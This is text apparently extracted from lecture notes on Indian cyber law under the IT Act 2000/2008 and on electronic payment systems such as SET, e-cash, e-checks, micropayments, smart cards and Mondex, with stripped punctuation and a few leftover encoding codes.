Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 2
2
Requirements For E-payments
The various factors that have lead the financial institutions to make use of electronic payments
are
1 Decreasing technology cost The technology used in the networks is decreasing day by
day
2 Reduced operational and processing costDue to reduced technology cost the processing
cost of various commerce activities becomes very less A very simple reason to prove this
is the fact that in electronic transactions we save both paper and time
3 Increasing online commerce
Some Examples Of EPS-
Online Reservation
Online Bill Payment
Online Order Placing (Nirulas)
Online Ticket Booking ( Movie)
Major Internet Payment Methods
Secure Electronics Transaction (SET) Protocol for implementing credit card payment
An Electronic Check system for supporting check payment
An Electronic funds transfer and Electronic Cash system for emulating physical cash
payment
Other methods
bull Micropayment methods and Smart card methods
Two Storage Methods
On-line
Individual does not have possession personally of electronic cash
Trusted third party eg online bank holds customersrsquo cash accounts
Off-line
Customer holds cash on smart card or software wallet
Fraud and double spending require tamper-proof encryption
PREPARED BY ARUN PRATAP SINGH 3
3
E-Cash
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
PREPARED BY ARUN PRATAP SINGH 4
4
E-Wallet
The E-wallet is another payment scheme that operates like a carrier of e-cash and other
information
The aim is to give shoppers a single simple and secure way of carrying currency
electronically
Trust is the basis of the e-wallet as a form of electronic payment
Procedure for using an e-wallet
1 Decide on an online site where you would like to shop
2 Download a wallet from the merchantrsquos website
3 Fill out personal information such as your credit card number name address and phone
number and where merchandise should be shipped
4 When you are ready to buy click on the wallet button the buying process is fully
executed
PREPARED BY ARUN PRATAP SINGH 5
5
Smart Cards
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
Smart card Processing
PREPARED BY ARUN PRATAP SINGH 6
6
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Credit cards
It is a Plastic Card having a Magnetic Number and code on it
It has Some fixed amount to spend
Customer has to repay the spend amount after sometime
PREPARED BY ARUN PRATAP SINGH 7
7
Processing a Credit cards payment ndash
Risk in using Credit cards -
Operational Risk
Credit Risk
Legal Risk
Secure Electronic Transaction (SET) Protocol
Jointly designed by MasterCard and Visa with backing of Microsoft Netscape IBM
GTE SAIC and others
Designed to provide security for card payments as they travel on the Internet
Contrasted with Secure Socket Layers (SSL) protocol SET validates consumers
and merchants in addition to providing secure transmission
SET specification
Uses public key cryptography and digital certificates for validating both
consumers and merchants
PREPARED BY ARUN PRATAP SINGH 8
8
Provides privacy data integrity user and merchant authentication and consumer
nonrepudiation
The SET Protocol
What Is Payment Gateways
A payment gateway is an e-commerce application service provider service that
authorizes payments for e-businesses online Shopping etc
PREPARED BY ARUN PRATAP SINGH 9
9
Payment gateway protects credit cards details encrypting sensitive information such
as credit card numbers to ensure that information passes securely between the
customer and the merchant and also between merchant and payment processor
How It works
Payments In India
Going the e-way
e-PAYMENT SYSTEM IN INDIA
bull Ever-increasing technology changes
bull Growing Internet access and mobile subscriber base
bull Rising consumer confidence
bull Convenient deliverypayment models
bull India has been one of the fastest growing country for payment cards in the Asia-Pacific
region
bull India currently has approximately 130 million cards (both debit and credit) in circulation
PREPARED BY ARUN PRATAP SINGH 10
10
GROWTH IN e-PAYMENT SYSTEM
REGULATION-
The Reserve Bank of India (RBI) has been supportive in the development of electronic
payments
In this direction the ldquoPayments and Settlement System Actrdquo was enacted
Apart from being supporting the RBI has also initiated various programs to encourage e-
payments
CHANNELS OF PAYMENT-
Indian banks have put in place various channels of electronic payments in place to
encourage customers to adopt the electronic mode
Channels like the Internet mobile ATMs and drop boxes are some of the most
frequently used channels apart from bank branches
MARKET MAPPING-
E-payments processing market has two major players namely
Tech Process and Bill Desk which is a pure play electronic transaction processing company
The Indian Payment System Is Transforming From Paper Mode To Electronic Mode
Two main reasons for such shift are-
PREPARED BY ARUN PRATAP SINGH 11
11
1 The regulator has mandated routing all high-value transactions electronically to minimize
movement of money and risk
2 At the retail end customers are realizing the efficiency of electronic payments
SHIFTS IN THE PAYMENT SYSTEM
TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT
bull Electronic Clearing Service (Credit and Debit)
bull National Electronic Fund Transfer (NEFT)
THE RULING PLASTIC MONEY
Credit cards
Debit cards
ATM Cards
PayPal
PayPal is a global e-commerce business allowing payments and money transfers to be made
through the Internet Online money transfers serve as electronic alternatives to paying with
traditional paper methods such as checks and money orders It is subject to the US economic
sanction list and other rules and interventions required by US laws or government PayPal is an
acquirer performing payment processing for online vendors auction sites and other commercial
PREPARED BY ARUN PRATAP SINGH 12
12
users for which it charges a fee It may also charge a fee for receiving money proportional to the
amount received The fees depend on the currency used the payment option used the country
of the sender the country of the recipient the amount sent and the recipients account type In
addition eBay purchases made by credit card through PayPal may incur extra fees if the buyer
and seller use different currencies On October 3 2002 PayPal became a wholly owned
subsidiary of eBay Its corporate headquarters are in San Jose California United States at eBays
North First Street satellite office campus The company also has significant operations in Omaha
Scottsdale Charlotte and Austin in the United States Chennai in India Dublin in Ireland
Kleinmachnow in Germany and Tel Aviv in Israel From July 2007 PayPal has operated across
the European Union as a Luxembourg-based bank
Google Wallet
Google Wallet was launched in 2011 serving a similar function as PayPal to facilitate payments
and transfer money online It also features highly robust security and additional features such as
the ability to send payments as attachments via email
PREPARED BY ARUN PRATAP SINGH 13
13
CHARACTERISTICS OF PAYMENT SYSTEM
There is no paper involved so electronic payments can be effected directly from home or office
Fast efficient safe secure and generally less costly than paper-based alternatives eg cheques
Electronic payments are fully traceable
In Ireland the clearing time for standard electronic payments is next day value for interbank
transfers subject to the payment instruction being received ahead of lsquoshut-offrsquo times which can
vary from bank to bank Payment instructions received after the lsquoshut-offrsquo time will be processed
one working day later
Most banks offer same day value for payments made to other accounts held in that same bank
Many banks offer same day money transfer inter-bank services for large value payments
Unlike cheques electronic payments donrsquot lsquobouncersquo ndash as payments will not be effected unless the
funds are available in the first place
PREPARED BY ARUN PRATAP SINGH 14
14
Features of Payment Methods
bull Anonymity whether the payment method is anonymous
bull Security whether the payment method is secure
bull Overhead cost the overhead cost of processing a payment
bull Transferability whether a payment can be carried out without the involvement of a
third party
bull Divisibility whether a payment can be divided into arbitrary small payments whose
sum is equal to the original payment
bull Acceptability whether the payment method is supported globally
4C PAYMENTS METHODS
To make the e-commerce system functional we also need to incorporate payment
functions into the system
In the physical world there are 4 types of payment methods
bull Cash
bull Credit card
bull Check
bull Creditdebit (Fund Transfer)
bull Payment method should be
ndash Very secure
ndash Having Low overhead cost
ndash Transferable
ndash Acceptable anywhere
ndash Divisible
ndash Anonymous
Comparison of the 4C payment methods
PREPARED BY ARUN PRATAP SINGH 15
15
SET PROTOCOL FOR CREDIT CARD PAYMENT
bull The credit card is one of the most commonly used payment methods in e-commerce in particular B2C e-commerce
bull Before the introduction SET protocol secure credit card payment was usually carried out over an SSL connection
Advantage of SSL
bull It ensures the secure transmission of credit card information over the internet
Disadvantage of SSL
bull It is not a complete credit card payment method
bull For example it cannot support on-line credit card authorization
SET is specially developed to provide secure credit card payment over the internet
It is now widely supported by major credit card companies including Visa and
MasterCard
PREPARED BY ARUN PRATAP SINGH 16
16
bull SET aims at satisfying the following security requirements in the context of credit card
payment
ndash Confidentiality - Sensitive messages are encrypted so that they are kept
confidential
ndash Integrity - Nearly all messages are digitally signed to ensure content integrity
ndash Authentication - Authentication is performed through a public key infrastructure
SET network architecture
Merchant a seller which is connected to an acquirer
Cardholder a registered holder of the credit card who is a buyer
Issuer the bank that issues the credit card to a cardholder
Acquirer the bank that serves as an ldquoagentrdquo to link a merchant to multiple issuers
bull A merchant can process various credit cards through a single acquirer
bull Payment Gateway This is typically connected to the acquirer
ndash The payment gateway is situated between the SET system and the financial
network of the current credit card system for processing the credit card payment
SET Digital Certificate System
PREPARED BY ARUN PRATAP SINGH 17
17
Dual signature generation and verification ndash
bull In the physical credit card system
ndash the Payment Instructions (PI) including the cardholderrsquos credit card number and
signature are not kept confidential
ndash data integrity can basically be ensured by using printed receipts
ndash cardholderrsquos authentication relies on simple signature checking only
bull In an electronic credit card system
ndash the Order Information (OI) and PI can be digitally signed to ensure data integrity
ndash the sensitive credit card information may still be disclosed to other people
bull SET introduces a novel method called the dual signature (DS) to ensure data integrity
while protecting the sensitive information
PREPARED BY ARUN PRATAP SINGH 18
18
How the merchant and the payment gateway can verify the DS
bull The merchant is provided with OI H[PI] and DS
bull The dual signature can be verified as follows
Step 1 The merchant first finds
H[ H[PI] || H[OI] ]
Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as
follows
DRSA[ DS | keypublic_sign cardholder ]
Where
keypublic_sign cardholder public signature key of the cardholder
PREPARED BY ARUN PRATAP SINGH 19
19
Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
